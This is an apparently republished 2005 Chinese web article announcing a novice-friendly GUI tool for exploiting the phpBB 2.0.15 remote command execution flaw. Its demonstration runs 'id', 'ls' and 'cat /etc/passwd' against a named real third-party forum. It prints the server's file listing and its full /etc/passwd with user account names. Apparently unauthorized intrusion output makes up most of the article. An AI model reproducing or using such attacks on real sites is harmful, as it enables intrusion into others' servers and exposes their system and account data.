烦人的小学期终于上完了,看到无敌兄的<<PHPbb2.0.15远程命令执行漏洞测试改写小记>>,现在有空了,自己也写了一个此漏洞的利用程序的GUI版,适合菜鸟使用.程序基本实现了http://www.securiteam.com/exploits/5QP0X00G0C.html这个python程序的功能.注意:读取数据量过大时,程序会出现短暂的假死.
测试:
Forum Url: http://www.tuoitho.net/diendan/
Topic ID: 15218 Command: id
Data Received: uid=99(nobody) gid=99(nobody) groups=99(nobody)

当然我们可以换用其他命令如输入ls返回:

_makepagelink.php
_new_register.txt
_news.txt
admin
bank_index.php
cache
chat_popup.js
common.php
config.php
db
ecards
extension.inc
faq.php
flashgame
forum.php
gallery
groupcp.php
images
includes
index.php
language
login.php
memberlist.php
modcp.php
photo
posting.php
privmsg.php
profile.php
realmusic.php
search.php
streammedia.php
templates
tt_images
tt_temp
ttd_news.php
vietuni8.js
viewforum.php
viewonline.php
viewtopic.php
ysi.htm
ysi.php

输入cat /etc/passwd返回:

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
ident:x:100:101::/home/ident:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
wnn:x:49:49:Wnn Input Server:/var/lib/wnn:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
mysql:x:101:102:MySQL server:/var/lib/mysql:/bin/bash
mailnull:x:47:47:Exim:/var/spool/mqueue:/bin/false
cpanel:x:32001:502::/usr/local/cpanel:/bin/bash
mailman:x:32002:503::/usr/local/cpanel/3rdparty/mailman:/bin/bash
ltsv-1990:x:32003:32003::/home/ltsv-1990:/bin/bash
ttnet:x:32004:504::/home/ttnet:/bin/bash
ttmail:x:32005:505::/home/ttmail:/usr/local/cpanel/bin/noshell
doicongl:x:32006:506::/home/doicongl:/usr/local/cpanel/bin/noshell
realmsof:x:32007:507::/home/realmsof:/usr/local/cpanel/bin/noshell
trpanoco:x:32009:509::/home/trpanoco:/usr/local/cpanel/bin/noshell
qua:x:32008:508::/home/qua:/usr/local/cpanel/bin/noshell
key:x:32010:510::/home/key:/usr/local/cpanel/bin/noshell
cuop:x:32011:511::/home/cuop:/usr/local/cpanel/bin/noshell
bluewebp:x:32012:512::/home/bluewebp:/usr/local/cpanel/bin/noshell
shugoten:x:32013:513::/home/shugoten:/usr/local/cpanel/bin/noshell
afghansa:x:32014:514::/home/afghansa:/usr/local/cpanel/bin/noshell
polishtr:x:32015:515::/home/polishtr:/usr/local/cpanel/bin/noshell
gioitrec:x:32016:516::/home/gioitrec:/usr/local/cpanel/bin/noshell
colorado:x:32017:517::/home/colorado:/usr/local/cpanel/bin/noshell
wannabel:x:32018:518::/home/wannabel:/usr/local/cpanel/bin/noshell
cactuslo:x:32019:519::/home/cactuslo:/usr/local/cpanel/bin/noshell
aznphoto:x:32020:520::/home/aznphoto:/bin/bash
journeyo:x:32021:521::/home/journeyo:/usr/local/cpanel/bin/noshell
chiropra:x:32022:522::/home/chiropra:/usr/local/cpanel/bin/noshell

本文地址：http://www.4so.net/web/php/439.html
将本页加入收藏夹 将地址复制到剪贴板发送给好友 若发现本文有误或版权问题点击这里

PHP:404错误陷阱并email给管理员的程序

用php实现qq挂机

热门信息

无相关信息

文章评论收藏本文打印本文关闭窗口

PHPbb2.0.15远程命令执行漏洞利用程序

日期：2005-07-09 00:00:00 来源：中国站长学院 请您记住思索网的网址： http://www.4so.net [加入收藏夹]

本文地址：http://www.4so.net/web/php/439.html 将本页加入收藏夹 将地址复制到剪贴板发送给好友 若发现本文有误或版权问题点击这里

日期：2005-07-09 00:00:00 来源：中国站长学院
请您记住思索网的网址： http://www.4so.net [加入收藏夹]

本文地址：http://www.4so.net/web/php/439.html
将本页加入收藏夹将地址复制到剪贴板发送给好友若发现本文有误或版权问题点击这里